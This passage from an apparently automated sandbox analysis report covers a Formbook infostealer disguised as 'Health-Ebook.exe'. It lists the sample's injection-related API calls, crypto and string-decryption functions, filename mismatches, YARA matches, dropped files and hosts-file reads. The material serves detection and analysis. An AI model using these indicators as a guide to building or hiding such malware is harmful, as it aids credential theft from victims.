Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_004F1651 RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory,2_2_004F1651
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_004F162A CreateThread,TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,2_2_004F162A
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_004F472A NtProtectVirtualMemory,2_2_004F472A
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_004F1FCC Sleep,NtProtectVirtualMemory,2_2_004F1FCC
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_004F4E98 NtSetInformationThread,2_2_004F4E98
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 14_2_006F008A NtSetInformationThread,TerminateProcess,14_2_006F008A
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 14_2_006F4A7B NtResumeThread,14_2_006F4A7B
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 14_2_006F472A NtProtectVirtualMemory,14_2_006F472A
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 14_2_006F17C8 NtWriteVirtualMemory,14_2_006F17C8
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 14_2_006F4E98 NtResumeThread,14_2_006F4E98
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40A750 NtCreateFile,LdrInitializeThunk,15_2_1F40A750
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40A700 NtProtectVirtualMemory,LdrInitializeThunk,15_2_1F40A700
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40A720 NtResumeThread,LdrInitializeThunk,15_2_1F40A720
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40A610 NtAdjustPrivilegesToken,LdrInitializeThunk,15_2_1F40A610
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40A6A0 NtCreateSection,LdrInitializeThunk,15_2_1F40A6A0
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40A540 NtDelayExecution,LdrInitializeThunk,15_2_1F40A540
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40A560 NtQuerySystemInformation,LdrInitializeThunk,15_2_1F40A560
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40A5F0 NtReadVirtualMemory,LdrInitializeThunk,15_2_1F40A5F0
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40A410 NtQueryInformationToken,LdrInitializeThunk,15_2_1F40A410
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40A480 NtMapViewOfSection,LdrInitializeThunk,15_2_1F40A480
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40A4A0 NtUnmapViewOfSection,LdrInitializeThunk,15_2_1F40A4A0
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40A360 NtAllocateVirtualMemory,LdrInitializeThunk,15_2_1F40A360
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40A3E0 NtFreeVirtualMemory,LdrInitializeThunk,15_2_1F40A3E0
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40A240 NtReadFile,LdrInitializeThunk,15_2_1F40A240
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40A2D0 NtClose,LdrInitializeThunk,15_2_1F40A2D0
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40A710 NtQuerySection,15_2_1F40A710
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40A780 NtOpenDirectoryObject,15_2_1F40A780
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40A650 NtQueueApcThread,15_2_1F40A650
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40A6D0 NtCreateProcessEx,15_2_1F40A6D0
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40BD40 NtSuspendThread,15_2_1F40BD40
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40A520 NtEnumerateKey,15_2_1F40A520
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40A5A0 NtWriteVirtualMemory,15_2_1F40A5A0
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40A460 NtOpenProcess,15_2_1F40A460
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40A470 NtSetInformationFile,15_2_1F40A470
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40B470 NtOpenThread,15_2_1F40B470
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40B410 NtOpenProcessToken,15_2_1F40B410
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40A430 NtQueryVirtualMemory,15_2_1F40A430
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40ACE0 NtCreateMutant,15_2_1F40ACE0
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40A350 NtQueryValueKey,15_2_1F40A350
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40A370 NtQueryInformationProcess,15_2_1F40A370
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40A310 NtEnumerateValueKey,15_2_1F40A310
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40A3D0 NtCreateKey,15_2_1F40A3D0
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40A260 NtWriteFile,15_2_1F40A260
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40A220 NtWaitForSingleObject,15_2_1F40A220
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40BA30 NtSetContextThread,15_2_1F40BA30
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40A2F0 NtQueryInformationFile,15_2_1F40A2F0
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40A800 NtSetValueKey,15_2_1F40A800
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F40B0B0 NtGetContextThread,15_2_1F40B0B0
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_004F008A NtSetInformationThread,15_2_004F008A
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_004F4A7B NtSetInformationThread,15_2_004F4A7B
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_004F1651 RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory,15_2_004F1651
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_004F162A CreateThread,TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,15_2_004F162A
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_004F472A NtProtectVirtualMemory,15_2_004F472A
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_004F1FCC Sleep,NtProtectVirtualMemory,15_2_004F1FCC
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_004F4E98 NtSetInformationThread,15_2_004F4E98
Detected potential crypto functionShow sources
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D17462_2_1F5D1746
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5067D02_2_1F5067D0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D1FCE2_2_1F5D1FCE
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5257902_2_1F525790
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C27822_2_1F5C2782
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5276402_2_1F527640
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F535E702_2_1F535E70
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F534E612_2_1F534E61
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5CCE662_2_1F5CCE66
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5366112_2_1F536611
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D26F82_2_1F5D26F8
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3E962_2_1F5C3E96
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F500D402_2_1F500D40
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D25192_2_1F5D2519
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C1D1B2_2_1F5C1D1B
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5215302_2_1F521530
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5AC53F2_2_1F5AC53F
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5BFDDB2_2_1F5BFDDB
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5CD5D22_2_1F5CD5D2
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5B1DE32_2_1F5B1DE3
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5AE58A2_2_1F5AE58A
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5CE5812_2_1F5CE581
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53547E2_2_1F53547E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5214102_2_1F521410
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F51740C2_2_1F51740C
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5BF42B2_2_1F5BF42B
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5CDCC52_2_1F5CDCC5
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C44EF2_2_1F5C44EF
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D1C9F2_2_1F5D1C9F
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D2C9A2_2_1F5D2C9A
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C34902_2_1F5C3490
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52FB402_2_1F52FB40
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5363C22_2_1F5363C2
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F50EBE02_2_1F50EBE0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F534B962_2_1F534B96
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F534A5B2_2_1F534A5B
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5DE2142_2_1F5DE214
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C0A022_2_1F5C0A02
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53523D2_2_1F53523D
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D22DD2_2_1F5D22DD
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D1A992_2_1F5D1A99
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5242B02_2_1F5242B0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53594B2_2_1F53594B
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5371102_2_1F537110
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5599062_2_1F559906
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C61DF2_2_1F5C61DF
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D19E22_2_1F5D19E2
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5361802_2_1F536180
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5DD9BE2_2_1F5DD9BE
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5310702_2_1F531070
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5398102_2_1F539810
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5CD0162_2_1F5CD016
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5300212_2_1F530021
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53E0202_2_1F53E020
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5348CB2_2_1F5348CB
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D28E82_2_1F5D28E8
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F51A0802_2_1F51A080
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5B18B62_2_1F5B18B6
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_0008A8522_2_0008A852
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_000810692_2_00081069
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_000810722_2_00081072
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_0008DAAC2_2_0008DAAC
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_00085AEF2_2_00085AEF
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_00085AF22_2_00085AF2
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_00082CF22_2_00082CF2
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_000896792_2_00089679
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_00087F522_2_00087F52
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_000A78EB2_2_000A78EB
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_000BB0EE2_2_000BB0EE
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_000A78F02_2_000A78F0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_000BB4D52_2_000BB4D5
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_000BADB32_2_000BADB3
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F49174615_2_1F491746
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F491FCE15_2_1F491FCE
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F3E579015_2_1F3E5790
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F48278215_2_1F482782
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F3C67D015_2_1F3C67D0
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F48CE6615_2_1F48CE66
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F3F661115_2_1F3F6611
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F3F5E7015_2_1F3F5E70
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F3F4E6115_2_1F3F4E61
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F3E764015_2_1F3E7640
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F4926F815_2_1F4926F8
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F483E9615_2_1F483E96
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F3E153015_2_1F3E1530
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F49251915_2_1F492519
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F481D1B15_2_1F481D1B
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F46C53F15_2_1F46C53F
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F3C0D4015_2_1F3C0D40
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F48D5D215_2_1F48D5D2
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F47FDDB15_2_1F47FDDB
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F471DE315_2_1F471DE3
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F48E58115_2_1F48E581
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F46E58A15_2_1F46E58A
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F3E141015_2_1F3E1410
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F3D740C15_2_1F3D740C
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F3F547E15_2_1F3F547E
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F47F42B15_2_1F47F42B
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F48DCC515_2_1F48DCC5
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F4844EF15_2_1F4844EF
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F492C9A15_2_1F492C9A
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F491C9F15_2_1F491C9F
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F48349015_2_1F483490
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F3EFB4015_2_1F3EFB40
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F3F4B9615_2_1F3F4B96
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F3CEBE015_2_1F3CEBE0
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F3F63C215_2_1F3F63C2
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F3F523D15_2_1F3F523D
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F480A0215_2_1F480A02
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F49E21415_2_1F49E214
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F3F4A5B15_2_1F3F4A5B
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F3E42B015_2_1F3E42B0
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F4922DD15_2_1F4922DD
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F491A9915_2_1F491A99
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F3F711015_2_1F3F7110
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F41990615_2_1F419906
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F3F594B15_2_1F3F594B
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F4861DF15_2_1F4861DF
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F4919E215_2_1F4919E2
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F3F618015_2_1F3F6180
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F49D9BE15_2_1F49D9BE
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F3F002115_2_1F3F0021
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F3FE02015_2_1F3FE020
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F3F981015_2_1F3F9810
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F3F107015_2_1F3F1070
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F48D01615_2_1F48D016
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F4928E815_2_1F4928E8
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F3DA08015_2_1F3DA080
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F4718B615_2_1F4718B6
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F3F48CB15_2_1F3F48CB
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_0007B0EE15_2_0007B0EE
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_000678EB15_2_000678EB
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_000678F015_2_000678F0
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_0007B4D515_2_0007B4D5
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_0007ADB315_2_0007ADB3
Found potential string decryption / allocating functionsShow sources
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: String function: 1F41DDE8 appears 49 times
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: String function: 1F455110 appears 45 times
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: String function: 1F3CB0E0 appears 176 times
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: String function: 1F595110 appears 40 times
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: String function: 1F50B0E0 appears 176 times
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: String function: 1F55DDE8 appears 49 times
PE file contains strange resourcesShow sources
Source: Health-Ebook.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version infoShow sources
Source: Health-Ebook.exe, 00000000.00000000.748082142.0000000000413000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCerithiumun.exe vs Health-Ebook.exe
Source: Health-Ebook.exe, 00000002.00000002.825855427.000000001F78F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Health-Ebook.exe
Source: Health-Ebook.exe, 00000002.00000000.767415352.0000000000413000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCerithiumun.exe vs Health-Ebook.exe
Source: Health-Ebook.exe, 00000002.00000002.820644898.00000000000E9000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamenetsh.exej% vs Health-Ebook.exe
Source: Health-Ebook.exe, 00000002.00000002.824038422.000000001EF00000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs Health-Ebook.exe
Source: Health-Ebook.exe, 00000002.00000002.824096006.000000001F050000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs Health-Ebook.exe
Source: Health-Ebook.exeBinary or memory string: OriginalFilenameCerithiumun.exe vs Health-Ebook.exe
Tries to load missing DLLsShow sources
Source: C:\Windows\explorer.exeSection loaded: ndfapi.dllJump to behavior
Yara signature matchShow sources
Source: 00000002.00000002.824223274.000000001F2B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.824223274.000000001F2B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.1092674638.000000001F170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.1092674638.000000001F170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.820345826.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.820345826.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.1088842031.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.1088842031.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Binary contains paths to development resourcesShow sources
Source: explorer.exe, 00000003.00000000.796297277.0000000007CD5000.00000004.00000001.sdmpBinary or memory string: .VBPcuZ
Classification labelShow sources
Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@15/8@9/3
Creates files inside the user directoryShow sources
Source: C:\Windows\SysWOW64\netsh.exeFile created: C:\Users\user\AppData\Roaming\O2116906Jump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1456:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1976:120:WilError_01
Creates temporary filesShow sources
Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\BjrnhJump to behavior
PE file has an executable .text section and no other executable sectionShow sources
Source: Health-Ebook.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this applications are using VB runtime library 6.0 (Probably coded in Visual Basic)Show sources
Source: C:\Users\user\Desktop\Health-Ebook.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
Reads ini filesShow sources
Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\Health-Ebook.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Users\user\Desktop\Health-Ebook.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Health-Ebook.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Health-Ebook.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Health-Ebook.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
